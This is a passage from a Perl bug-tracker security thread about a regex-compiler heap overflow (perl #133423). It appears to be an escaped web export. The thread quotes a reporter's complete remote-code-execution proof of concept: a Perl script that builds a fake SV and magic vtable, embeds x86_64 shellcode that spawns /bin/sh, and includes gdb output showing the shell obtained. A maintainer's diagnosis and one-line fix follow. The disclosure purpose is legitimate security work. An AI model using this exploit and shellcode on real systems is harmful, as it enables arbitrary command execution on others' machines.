do\\_clean\\_named\\_objs \\(sv=sv@\u0026#8203;entry=0xa2e958\\) at sv\\.c\u0026#8203;:560\n\u003e \\#10 0x0000000000524a07 in S\\_visit \\(f=0x5288b0 \\\u003cdo\\_clean\\_named\\_objs\u003e\\, \n\u003e flags=32777\\, mask=49407\\) at sv\\.c\u0026#8203;:476\n\u003e \\#11 0x00000000005292b0 in Perl\\_sv\\_clean\\_objs \\(\\) at sv\\.c\u0026#8203;:631\n\u003e \\#12 0x000000000044ef00 in perl\\_destruct \\(my\\_perl=\\\u003coptimized out\u003e\\) at \n\u003e perl\\.c\u0026#8203;:908\n\u003e \\#13 0x000000000041fb74 in main \\(argc=\\\u003coptimized out\u003e\\, argv=\\\u003coptimized \n\u003e out\u003e\\, env=\\\u003coptimized out\u003e\\) at perlmain\\.c\u0026#8203;:133\n\u003e \\(gdb\\) c\n\u003e Continuing\\.\n\u003e process 13359 is executing new program\u0026#8203;: /usr/bin/bash\n\u003e Error in re\\-setting breakpoint 2\u0026#8203;: Function \"S\\_mg\\_free\\_struct\" not defined\\.\n\u003e sh\\-4\\.4$ date\n\u003e Detaching after fork from child process 13509\\.\n\u003e Mon Aug 27 22\u0026#8203;:04\u0026#8203;:46 JST 2018\n\u003e \\`\\`\\`\n\u003e \n\u003e 2018\\-08\\-16 12\u0026#8203;:52 GMT\\+09\u0026#8203;:00 Karl Williamson via RT \n\u003e \\\u003cperl5\\-security\\-report\\-followup@\u0026#8203;perl\\.org \n\u003e 
\\\u003cmailto\u0026#8203;:perl5\\-security\\-report\\-followup@\u0026#8203;perl\\.org\u003e\u003e\u0026#8203;:\n\u003e \n\u003e Resending this as it did not make it to the list\u0026#8203;:\n\u003e \n\u003e On Wed\\, 15 Aug 2018 11\u0026#8203;:01\u0026#8203;:24 \\-0700\\, khw wrote\u0026#8203;:\n\u003e \u003e I suspect this is a serious security issue\\.  One can position where\n\u003e \u003e beyond the end of buffer gets written by adding \\\\x80's to the ones\n\u003e \u003e already there\\.  But I'd be happy to be wrong about this\\.\n\u003e \u003e\n\u003e \u003e The cause is one branch during the parsing leaves the parse pointer\n\u003e \u003e positioned one too far\\, and that causes the backslash to be skipped\n\u003e \u003e during pass2\\, which causes a '\\]' to be treated as a metacharacter\n\u003e \u003e instead of a literal\\.\n\u003e \u003e\n\u003e \u003e The fix is to remove the single line that incorrectly increments the\n\u003e \u003e parse pointer\\.\n\u003e \u003e I don't know that this being an experimental feature has any bearing\n\u003e \u003e on it\\.\n\u003e \u003e\n\u003e \u003e There is another thing\\.  The minus sign in this case could have been\n\u003e \u003e caught as incorrect\\.  
But the same out\\-of\\-bounds writes would\n\u003e occur if\n\u003e \u003e a '^' replaced the minus\\, and that would be a correct use\\.\n\u003e \u003e\n\u003e \u003e Karl Williamson\n\u003e \n\u003e ","bodyHTML":"\u003ch3 dir=\"auto\"\u003eFrom \u003ca class=\"user-mention notranslate\" data-hovercard-type=\"user\" data-hovercard-url=\"/users/khwilliamson/hovercard\" data-octo-click=\"hovercard-link-click\" data-octo-dimensions=\"link_type:self\" href=\"https://github.com/khwilliamson\"\u003e@khwilliamson\u003c/a\u003e\u003c/h3\u003e\n\u003cp dir=\"auto\"\u003eOn 08/27/2018 07​:16 AM, Eiichi Tsukata wrote​:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp dir=\"auto\"\u003eThe following code generates a regexp which executes arbitrary command\u003cbr\u003e\nduring global destruction.\u003cbr\u003e\nIt overwrites some SV pointer address to a crafted fake SV on\u003cbr\u003e\noverwritten heap which has the malicious svt_free(shell_code) on its\u003cbr\u003e\nmagic vtable.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eLimitations​:\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e  - must set `execstack -s` to perl\u003cbr\u003e\n  - require address leak(exact address of overwritten heap)\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp dir=\"auto\"\u003eShouldn't this be getting a CVE?\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp dir=\"auto\"\u003e```\u003cbr\u003e\n#!/usr/bin/perl\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e#\u003cbr\u003e\n# RCE exploit PoC for\u003cbr\u003e\n#   [perl #133423] regcomp​: heap-buffer-overflow write\u003cbr\u003e\n# on perl-blead-48ae8dc\u003cbr\u003e\n#\u003c/p\u003e\n\u003cp dir=\"auto\"\u003euse strict;\u003cbr\u003e\nuse warnings;\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# 0xabcd =\u0026gt; '\\xcd\\xab\\x00\\x00\\x00\\x00\\x00\\x00'\u003cbr\u003e\nsub h2s {\u003cbr\u003e\n    my $h = shift;\u003cbr\u003e\n    my $sz = shift;\u003cbr\u003e\n    my $ret = '';\u003cbr\u003e\n    for (0..($sz - 1)) {\u003cbr\u003e\n        $ret .= 
sprintf(\"\\\\x%02x\", (($h \u0026gt;\u0026gt; (8 * $_)) \u0026amp; 0xff));\u003cbr\u003e\n    }\u003cbr\u003e\n    return $ret\u003cbr\u003e\n}\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# must set `execstack -s` to perl\u003cbr\u003e\nmy $cmd = 'gdb -q --args\u003cbr\u003e\n~/perl5/perlbrew/perls/perl-blead-debug/bin/perl -DorD -le ';\u003cbr\u003e\nmy $prefix = '\\'my $r = \"(?[(?x​:(?[\\\\\\\\a]))\\\\\\\\]a\\x00';\u003c/p\u003e\n\u003cp dir=\"auto\"\u003emy $address = 0xa34c7d; # overwrite start address\u003cbr\u003e\n                        # search with​:\u003cbr\u003e\n                        #   (gdb) b regcomp.c​:14044\u003cbr\u003e\n                        #   (gdb) p s\u003cbr\u003e\n                        # [CAUTION] must not contain ']' (0x5d)\u003cbr\u003e\n                        #\u003cbr\u003e\nmy $sv_any_address     = $address + 8 + 4 + 4 + 8;\u003cbr\u003e\nmy $stash_address      = $sv_any_address + 8 + 8;\u003cbr\u003e\nmy $stash_address2     = $stash_address + 8 + 4 + 4;\u003cbr\u003e\nmy $magic_address      = $stash_address + 8 + 4 + 4 + 8 + 8 + 8 + 19 + 8;\u003cbr\u003e\nmy $mg_virtual_address = $magic_address + 8 + 8 + 2 + 1 + 1 + 8 + 8 + 8;\u003cbr\u003e\nmy $shell_code_address = $mg_virtual_address + 8 + 8 + 8 + 8 + 8;\u003c/p\u003e\n\u003cp dir=\"auto\"\u003emy $body =\u003cbr\u003e\n# sv($address)\u003cbr\u003e\n  h2s($sv_any_address, 8)\u003cbr\u003e\n. h2s(0x01, 4)                # sv_refcnt\u003cbr\u003e\n. h2s(0x100007, 4)            # sv_flags (SVt_PVMG || SVs_OBJECT)\u003cbr\u003e\n. h2s(0x00, 8)                # sv-\u0026gt;sv_u.svu_pv\u003cbr\u003e\n# any($sv_any_address)\u003cbr\u003e\n. h2s($stash_address, 8)      # HV* xmg_stash\u003cbr\u003e\n. h2s($magic_address, 8)      # union _xmgu xmg_u (MAGIC* xmg_magic)\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# xmg_stash($stash_address)\u003cbr\u003e\n. h2s($stash_address2, 8)     # sv_any\u003cbr\u003e\n. h2s(0x01, 4)                # sv_refcnt\u003cbr\u003e\n. 
h2s(0x0c, 4)                # sv_flags (SVt_PVHV)\u003cbr\u003e\n# any($stash_address2)\u003cbr\u003e\n. h2s(0x00, 8)                # HV* xmg_stash\u003cbr\u003e\n. h2s($magic_address, 8)      # union _xmgu xmg_u (MAGIC* xmg_magic)\u003cbr\u003e\n. h2s(0x00, 8)                # padding\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e. '\" . \"a\" x 19 . \"'          # padding\u003cbr\u003e\n. h2s($address, 8)            # OVERWRITE gvp\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# xmg_magic($magic_address)\u003cbr\u003e\n. h2s(0x00, 8)                # MAGIC* mg_moremagic;\u003cbr\u003e\n. h2s($mg_virtual_address, 8) # MGVTBL* mg_virtual  /* pointer to magic\u003cbr\u003e\nfunctions */\u003cbr\u003e\n. h2s(0x00, 2)                # U16         mg_private;\u003cbr\u003e\n. h2s(0x00, 1)                # char        mg_type;\u003cbr\u003e\n. h2s(0x00, 1)                # U8          mg_flags;\u003cbr\u003e\n. h2s(0x00, 8)                # SSize_t     mg_len;\u003cbr\u003e\n. h2s(0x00, 8)                # SV*         mg_obj;\u003cbr\u003e\n. h2s(0x00, 8)                # char*       mg_ptr;\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# mg_virual($mg_virtual_address)\u003cbr\u003e\n. h2s(0x00, 8)                # int  (*svt_get)      (pTHX_ SV *sv,\u003cbr\u003e\nMAGIC* mg);\u003cbr\u003e\n. h2s(0x00, 8)                # int  (*svt_set)      (pTHX_ SV *sv,\u003cbr\u003e\nMAGIC* mg);\u003cbr\u003e\n. h2s(0x00, 8)                # U32  (*svt_len)      (pTHX_ SV *sv,\u003cbr\u003e\nMAGIC* mg);\u003cbr\u003e\n. h2s(0x00, 8)                # int  (*svt_clear)(pTHX_ SV *sv, MAGIC* mg);\u003cbr\u003e\n. h2s($shell_code_address, 8) # int  (*svt_free)     (pTHX_ SV *sv,\u003cbr\u003e\nMAGIC* mg);\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# x86_64 shell_code\u003cbr\u003e\n.\u003cbr\u003e\n'\\x48\\x31\\xd2\\x52\\x48\\xb8\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x50\\x48\\x89\\xe7\\x52\\x57\\x48\\x89\\xe6\\x48\\x8d\\x42\\x3b\\x0f\\x05'\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e. 
'])a\\\\\\\\6\"; qr/$r/\\'';\u003c/p\u003e\n\u003cp dir=\"auto\"\u003emy $payload = $prefix . $body;\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eprint $cmd . $payload . \"\\n\";\u003cbr\u003e\n```\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eSample output\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e```\u003cbr\u003e\n[eiichi@​x1 exploit]$ perl perl_regexp_mg_free.pl\u003cbr\u003e\n\u0026lt;http​://perl_regexp_mg_free.pl\u0026gt;\u003cbr\u003e\ngdb -q --args ~/perl5/perlbrew/perls/perl-blead-debug/bin/perl -DorD -le\u003cbr\u003e\n'my $r =\u003cbr\u003e\n\"(?[(?x​:(?[\\\\a]))\\\\]a\\x00\\x95\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x07\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa5\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\xe8\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\xb5\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xe8\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\u003cbr\u003e\n. 
\"a\" x 19 .\u003cbr\u003e\n\"\\x7d\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x14\\x4d\\xa3\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x3c\\x4d\\xa3\\x00\\x00\\x00\\x00\\x00\\x48\\x31\\xd2\\x52\\x48\\xb8\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x50\\x48\\x89\\xe7\\x52\\x57\\x48\\x89\\xe6\\x48\\x8d\\x42\\x3b\\x0f\\x05])a\\\\6\";\u003cbr\u003e\nqr/$r/'\u003cbr\u003e\n[eiichi@​x1 exploit]$ gdb -q --args\u003cbr\u003e\n~/perl5/perlbrew/perls/perl-blead-debug/bin/perl -DorD -le 'my $r =\u003cbr\u003e\n\"(?[(?x​:(?[\\\\a]))\\\\]a\\x00\\x95\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x07\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa5\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\xe8\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\xb5\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xe8\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\u003cbr\u003e\n. 
\"a\" x 19 .\u003cbr\u003e\n\"\\x7d\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x14\\x4d\\xa3\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x3c\\x4d\\xa3\\x00\\x00\\x00\\x00\\x00\\x48\\x31\\xd2\\x52\\x48\\xb8\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x50\\x48\\x89\\xe7\\x52\\x57\\x48\\x89\\xe6\\x48\\x8d\\x42\\x3b\\x0f\\x05])a\\\\6\";\u003cbr\u003e\nqr/$r/'\u003cbr\u003e\nReading symbols from\u003cbr\u003e\n/home/eiichi/perl5/perlbrew/perls/perl-blead-debug/bin/perl...done.\u003cbr\u003e\n(gdb) b regcomp.c​:14044\u003cbr\u003e\nBreakpoint 1 at 0x4cb38d​: file regcomp.c, line 14044.\u003cbr\u003e\n(gdb) run\u003cbr\u003e\nStarting program​:\u003cbr\u003e\n/home/eiichi/perl5/perlbrew/perls/perl-blead-debug/bin/perl -DorD -le\u003cbr\u003e\nmy\\ \\$r\\ =\\\u003cbr\u003e\n\\\"\\(\\?\\[\\(\\?x​:\\(\\?\\[\\\\\\\\a\\]\\)\\)\\\\\\\\\\]a\\\\x00\\\\x95\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x07\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xa5\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb5\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x0c\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\"\\\u003cbr\u003e\n.\\ \\\"a\\\"\\ x\\ 19\\ 
.\\\u003cbr\u003e\n\\\"\\\\x7d\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x14\\\\x4d\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x3c\\\\x4d\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x48\\\\x31\\\\xd2\\\\x52\\\\x48\\\\xb8\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x2f\\\\x2f\\\\x73\\\\x68\\\\x50\\\\x48\\\\x89\\\\xe7\\\\x52\\\\x57\\\\x48\\\\x89\\\\xe6\\\\x48\\\\x8d\\\\x42\\\\x3b\\\\x0f\\\\x05\\]\\)a\\\\\\\\6\\\"\\;\\\u003cbr\u003e\nqr/\\$r/\u003cbr\u003e\n[Thread debugging using libthread_db enabled]\u003cbr\u003e\nUsing host libthread_db library \"/lib64/libthread_db.so.1\".\u003cbr\u003e\nwarning​: Loadable section \".note.gnu.property\" outside of ELF segments\u003cbr\u003e\nwarning​: Loadable section \".note.gnu.property\" outside of ELF segments\u003cbr\u003e\nwarning​: Loadable section \".note.gnu.property\" outside of ELF segments\u003cbr\u003e\n(-e​:0)  sv_upgrade clearing PL_stashcache\u003cbr\u003e\n(-e​:0)  sv_upgrade clearing PL_stashcache\u003cbr\u003e\n(-e​:0)  sv_upgrade clearing PL_stashcache\u003cbr\u003e\n(-e​:0)  sv_upgrade clearing PL_stashcache\u003cbr\u003e\n(-e​:0)  sv_upgrade clearing PL_stashcache\u003cbr\u003e\n(-e​:2)  Looking for DESTROY method for IO​::File\u003cbr\u003e\n(-e​:2)  Looking for method DESTROY in package IO​::File\u003cbr\u003e\n(-e​:2)  Looking for method DESTROY in package UNIVERSAL\u003cbr\u003e\n(-e​:2)  Looking for method AUTOLOAD in package IO​::File\u003cbr\u003e\n(-e​:2)  Looking for method AUTOLOAD in package UNIVERSAL\u003cbr\u003e\n(-e​:2)  Set 
cached DESTROY method 0 for IO​::File\u003cbr\u003e\nEnabling \u003cmath-renderer class=\"js-inline-math\" style=\"display: inline-block\" data-static-url=\"https://github.githubassets.com/static\" data-run-id=\"d0490739a8a4a2b21875cd89032c2637\"\u003e$` $\u003c/math-renderer\u003e\u0026amp;amp; $' support (0x7).\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eEXECUTING...\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eCompiling REx\u003cbr\u003e\n\"(?[(?x​:(?[\\a]))\\]a%0%x{95}L%x{a3}%0%0%0%0%0%1%0%0%0%7%0%20%0\"...\u003cbr\u003e\nThe regex_sets feature is experimental in regex; marked by \u0026lt;-- HERE in\u003cbr\u003e\nm/(?[ \u0026lt;-- HERE (?x​:(?[\\a]))\\]a?L??L???L?\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e ?aaaaaaaaaaaaaaaaaaa}L?M?\u0026lt;M?H1H?/bin//shPH?WH??B;])a\\6/ at -e line 1.\u003cbr\u003e\nThe regex_sets feature is experimental in regex; marked by \u0026lt;-- HERE in\u003cbr\u003e\nm/(?[(?x​:(?[ \u0026lt;-- HERE \\a]))\\]a?L??L???L?\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e ?aaaaaaaaaaaaaaaaaaa}L?M?\u0026lt;M?H1H?/bin//shPH?WH??B;])a\\6/ at -e line 1.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eBreakpoint 1, S_regatom (pRExC_state=pRExC_state@​entry=0x7fffffffcd40,\u003cbr\u003e\nflagp=flagp@​entry=0x7fffffffca24,\u003cbr\u003e\n    depth=depth@​entry=4) at regcomp.c​:14044\u003cbr\u003e\n14044                               *(s)++ = (U8) ender;\u003cbr\u003e\nMissing separate debuginfos, use​: dnf debuginfo-install\u003cbr\u003e\nkeyutils-libs-1.5.10-6.fc28.x86_64 krb5-libs-1.16.1-13.fc28.x86_64\u003cbr\u003e\nlibcom_err-1.44.2-0.fc28.x86_64\u003cbr\u003e\nlibnsl2-1.2.0-2.20180605git4a062cf.fc28.x86_64\u003cbr\u003e\nlibselinux-2.8-1.fc28.x86_64 libtirpc-1.0.3-3.rc2.fc28.x86_64\u003cbr\u003e\nlibxcrypt-4.1.1-4.fc28.x86_64 openssl-libs-1.1.0h-3.fc28.x86_64\u003cbr\u003e\npcre2-10.31-8.fc28.x86_64 zlib-1.2.11-8.fc28.x86_64\u003cbr\u003e\n(gdb) p s\u003cbr\u003e\n$1 = 0xa34c7d \"\"\u003cbr\u003e\n(gdb) b S_mg_free_struct\u003cbr\u003e\nBreakpoint 2 at 0x4f0620​: 
file mg.c, line 556.\u003cbr\u003e\n(gdb) dis br 1\u003cbr\u003e\n(gdb) c\u003cbr\u003e\nContinuing.\u003cbr\u003e\npanic​: reg_node overrun trying to emit 0, a34d5c\u0026gt;=a34c8c at -e line 1.\u003cbr\u003e\nCleaning named glob SV object​:\u003cbr\u003e\n SV = PVMG(0xa34c95) at 0xa34c7d\u003cbr\u003e\n  REFCNT = 1\u003cbr\u003e\n  FLAGS = (OBJECT)\u003cbr\u003e\n  IV = 0\u003cbr\u003e\n  NV = 5.28751820946919e-317\u003cbr\u003e\n  PV = 0\u003cbr\u003e\n  MAGIC = 0xa34ce8\u003cbr\u003e\n    MG_VIRTUAL = 0xa34d14\u003cbr\u003e\n    MG_TYPE = PERL_MAGIC_sv(\\0)\u003cbr\u003e\n  STASH = 0xa34ca5\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eBreakpoint 2, S_mg_free_struct (sv=sv@​entry=0xa34ca5, mg=0xa34ce8) at\u003cbr\u003e\nmg.c​:556\u003cbr\u003e\n556         const MGVTBL* const vtbl = mg-\u0026gt;mg_virtual;\u003cbr\u003e\n(gdb) bt\u003cbr\u003e\n#0  S_mg_free_struct (sv=sv@​entry=0xa34ca5, mg=0xa34ce8) at mg.c​:556\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"24492722\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/1\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/1/hovercard\" href=\"https://github.com/Perl/perl5/pull/1\"\u003e#1\u003c/a\u003e  0x00000000004f1153 in Perl_mg_free (sv=sv@​entry=0xa34ca5) at mg.c​:588\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"32825340\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/2\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/2/hovercard\" href=\"https://github.com/Perl/perl5/pull/2\"\u003e#2\u003c/a\u003e  0x0000000000527d9e in Perl_sv_clear (orig_sv=orig_sv@​entry=0xa34ca5)\u003cbr\u003e\nat sv.c​:6539\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"35342020\" data-permission-text=\"Title is 
private\" data-url=\"https://github.com/Perl/perl5/issues/3\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/3/hovercard\" href=\"https://github.com/Perl/perl5/pull/3\"\u003e#3\u003c/a\u003e  0x0000000000528784 in Perl_sv_free2 (sv=0xa34ca5, rc=\u0026lt;optimized\u003cbr\u003e\nout\u0026gt;) at sv.c​:7038\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"38664231\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/4\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/4/hovercard\" href=\"https://github.com/Perl/perl5/pull/4\"\u003e#4\u003c/a\u003e  0x00000000005273ec in S_SvREFCNT_dec (sv=\u0026lt;optimized out\u0026gt;) at\u003cbr\u003e\ninline.h​:216\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"39416547\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/5\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/5/hovercard\" href=\"https://github.com/Perl/perl5/pull/5\"\u003e#5\u003c/a\u003e  S_curse (sv=sv@​entry=0xa34c7d, check_refcnt=check_refcnt@​entry=true)\u003cbr\u003e\nat sv.c​:6970\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"53427695\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/6\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/6/hovercard\" href=\"https://github.com/Perl/perl5/pull/6\"\u003e#6\u003c/a\u003e  0x000000000052783a in Perl_sv_clear (orig_sv=orig_sv@​entry=0xa34c7d)\u003cbr\u003e\nat sv.c​:6531\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"90982472\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/7\" 
data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/7/hovercard\" href=\"https://github.com/Perl/perl5/pull/7\"\u003e#7\u003c/a\u003e  0x0000000000528784 in Perl_sv_free2 (sv=sv@​entry=0xa34c7d,\u003cbr\u003e\nrc=\u0026lt;optimized out\u0026gt;) at sv.c​:7038\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"98283145\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/8\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/8/hovercard\" href=\"https://github.com/Perl/perl5/pull/8\"\u003e#8\u003c/a\u003e  0x0000000000528c48 in S_SvREFCNT_dec_NN (sv=0xa34c7d) at inline.h​:227\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"98288284\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/9\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/9/hovercard\" href=\"https://github.com/Perl/perl5/pull/9\"\u003e#9\u003c/a\u003e  do_clean_named_objs (sv=sv@​entry=0xa2e958) at sv.c​:560\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"170856524\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/10\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/10/hovercard\" href=\"https://github.com/Perl/perl5/pull/10\"\u003e#10\u003c/a\u003e 0x0000000000524a07 in S_visit (f=0x5288b0 \u0026lt;do_clean_named_objs\u0026gt;,\u003cbr\u003e\nflags=32777, mask=49407) at sv.c​:476\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"214252446\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/11\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/11/hovercard\" 
href=\"https://github.com/Perl/perl5/pull/11\"\u003e#11\u003c/a\u003e 0x00000000005292b0 in Perl_sv_clean_objs () at sv.c​:631\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"275535515\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/12\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/12/hovercard\" href=\"https://github.com/Perl/perl5/pull/12\"\u003e#12\u003c/a\u003e 0x000000000044ef00 in perl_destruct (my_perl=\u0026lt;optimized out\u0026gt;) at\u003cbr\u003e\nperl.c​:908\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"329536409\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/13\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/13/hovercard\" href=\"https://github.com/Perl/perl5/pull/13\"\u003e#13\u003c/a\u003e 0x000000000041fb74 in main (argc=\u0026lt;optimized out\u0026gt;, argv=\u0026lt;optimized\u003cbr\u003e\nout\u0026gt;, env=\u0026lt;optimized out\u0026gt;) at perlmain.c​:133\u003cbr\u003e\n(gdb) c\u003cbr\u003e\nContinuing.\u003cbr\u003e\nprocess 13359 is executing new program​: /usr/bin/bash\u003cbr\u003e\nError in re-setting breakpoint 2​: Function \"S_mg_free_struct\" not defined.\u003cbr\u003e\nsh-4.4$ date\u003cbr\u003e\nDetaching after fork from child process 13509.\u003cbr\u003e\nMon Aug 27 22​:04​:46 JST 2018\u003cbr\u003e\n```\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e2018-08-16 12​:52 